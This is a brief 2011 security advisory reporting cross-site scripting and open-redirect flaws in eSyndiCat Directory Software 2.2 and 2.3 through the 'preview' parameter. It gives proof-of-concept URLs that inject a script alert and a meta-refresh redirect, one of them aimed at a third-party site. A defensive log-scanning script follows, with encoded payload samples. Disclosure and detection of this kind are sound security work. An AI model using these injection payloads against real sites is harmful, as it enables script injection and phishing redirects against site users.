eSyndiCat Directory Software versions 2.2 and 2.3 suffer from a cross-site scripting vulnerability.
662c6a9c8cd99810c4bea5fd7e48ca68e762fabe8afbf11ec54ca5529abdd774
eSyndiCat Directory Software (preview=) versions 2.2 and 2.3 - Cross-Site Scripting (XSS) & Redirect
http://www.esyndicat.com
30 - 01 - 2011
Avram Marius ( d3v1l )
http://twitter.com/securityshell - http://security-sh3ll.blogspot.com
--------------------------------------------------------------------------
Poc: 1 XSS & Redirect on v.2.3
http://www.esyndicat.com/demo/?preview="><script>alert('XSS')</script>
http://www.esyndicat.com/demo/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
--------------------------------------------------------------------------
Poc: 2 XSS & Redirect on v.2.2
http://ekedai.net/date/2008/08/?preview="><script>alert('XSS')</script>
http://ekedai.net/date/2008/08/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
--------------------------------------------------------------------------
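Added example, not part of the original advisory: a log check for defenders that flags requests whose preview parameter decodes to anything other than a plain token, including double-encoded values. The allow-list pattern, the function names and the sample log lines are assumptions constructed for illustration; the advisory does not document the parameter's legitimate format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate preview value is a short plain token. The same
# allow-list can be enforced server-side before the value is echoed into HTML.
SAFE_PREVIEW = re.compile(r"[A-Za-z0-9_-]{0,64}")

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_preview_values(target):
    """Return decoded preview values in a request target that fail the allow-list."""
    hits = []
    query = urlsplit(target).query
    for value in parse_qs(query, keep_blank_values=True).get("preview", []):
        for _ in range(3):  # unwrap nested percent-encoding such as %253C
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if not SAFE_PREVIEW.fullmatch(value):
            hits.append(value)
    return hits


def scan(lines):
    """Return (line_number, decoded_value) for every flagged preview parameter."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            for value in suspicious_preview_values(match.group(1)):
                findings.append((number, value))
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jan/2011:10:00:01 +0000] "GET /demo/?preview=default HTTP/1.1" 200 5120',
    '192.0.2.11 - - [30/Jan/2011:10:00:07 +0000] "GET /demo/?preview=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 5188',
    '198.51.100.4 - - [30/Jan/2011:10:01:15 +0000] "GET /demo/?preview=%2522%253E%253Cmeta%2520http-equiv%253D%2522Refresh%2522 HTTP/1.1" 200 5160',
    '192.0.2.12 - - [30/Jan/2011:10:02:00 +0000] "GET /demo/?category=books HTTP/1.1" 200 4870',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: preview={value!r}")
```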